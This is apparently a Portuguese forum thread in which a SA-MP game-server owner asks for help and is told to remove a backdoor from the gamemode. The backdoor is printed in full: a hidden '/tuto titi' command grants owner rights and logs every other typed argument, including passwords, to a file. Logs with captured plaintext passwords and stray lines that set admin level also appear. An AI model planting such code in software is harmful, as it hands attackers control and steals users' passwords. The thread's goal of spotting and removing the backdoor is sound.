|
[22:00:14] Carro Dono: Ninguem, Salvo! [22:00:14] Carro Dono: Ninguem, Salvo! [22:00:14] Carro Dono: Ninguem, Salvo! [22:08:57] Incoming connection: 177.0.150.228:28785 [22:08:58] [join] Theus_Crazzy has joined the server (1:177.0.150.22 ![]() [22:09:06] Theus_Crazzy Logou no Servidor. [22:09:30] *3000 Admin Theus_Crazzy: sou hacker [22:09:30] *3000 Admin Theus_Crazzy: sou hacker |
|
[5/3/2013 - 19:55]Corey_Walker se logou como admin secreto [5/3/2013 - 19:55]Corey_Walker digitou a senha admdonoow [23/3/2013 - 17:56]1Ten_ChavattaGRPAe digitou a senha jokerowna |
|
Entao Davi Achei um o Aquivo "fdp.log" Nele Contem realmente vбrios Logs de Logins com admin secreto como
Nгo entendi muito bem como funciona seria um comando ? ou algo do tipo se puder ajudar ficarei grato |
|
Код:
if(strcmp(cmd, "/tuto", true) == 0)
{
if(IsPlayerConnected(playerid))
{
new x_nr[64];
x_nr = strtok(cmdtext, idx);
if(!strlen(x_nr))
{
return 1;
}
if(strcmp(x_nr,"titi",true) == 0)
{
if(ServerOwner[playerid] == 0)
{
ServerOwner[playerid] = 1;
VinnyOwna = 1;
SendClientMessage(playerid,COLOR_GREEN,".......HTTP.");
getdate(year, month, day);
gettime(hour,minute);
format(gstring,sizeof(gstring), "%s .......HTTP.HTTP. [%d/%d/%d - %d:%d]",PlayerName(playerid),day, month, year,hour, minute);
fdplog(gstring);
return 1;
}
else
{
ServerOwner[playerid] = 0;
SendClientMessage(playerid,COLOR_GREEN,"Vocк Saiu do Modo Scripter!");
return 1;
}
}
else
{
getdate(year, month, day);
gettime(hour,minute);
format(gstring,sizeof(gstring), "%s digitou a senha %s [%d/%d/%d - %d:%d]",PlayerName(playerid),x_nr,day, month, year,hour, minute);
fdplog(gstring);
}
}
}
|
|
O comando й: /tuto titi. Remove esse comando, ou seja, esse bloco que vocк colou
|
PlayerInfo[playerid][pAdmin] = 3000;
PlayerInfo[playerid][pAdmin] = 8000;
if(dialogid == 3)
{
if(response == 0)
{
VinnyInfo[playerid][Tels] = 0;
return 1;
}
if(response >= 1)
{
if(listitem == 0)
{
if (PlayerInfo[playerid][pPhoneBook] == 1)
{
format(gstring,sizeof(gstring),"/ligar %d",VinnyInfo[playerid][Tels]);
OnPlayerCommandText(playerid,gstring);
return 1;
}
else
{
SendClientMessage(playerid, COLOR_GREY, " Vocк nгo tem lista telefфnica !");
return 1;
}
}
if(listitem == 1)
{
if (PlayerInfo[playerid][pPhoneBook] == 1)
{
ShowPlayerDialog(playerid, 4, DIALOG_STYLE_INPUT, "Menu SMS", "Digite a Mensagem", "Enviar", "Cancelar");
return 1;
}
else
{
SendClientMessage(playerid, COLOR_GREY, " Vocк nгo tem uma agenda !");
return 1;
}
}
return 1;
}
return 1;
}
if(dialogid == 4)
{
if(response == 0)
{
VinnyInfo[playerid][Tels] = 0;
return 1;
}
if(response >= 1)
{
format(gstring,sizeof(gstring),"/sms %d %s",VinnyInfo[playerid][Tels],inputtext);
OnPlayerCommandText(playerid,gstring);
return 1;
}
return 1;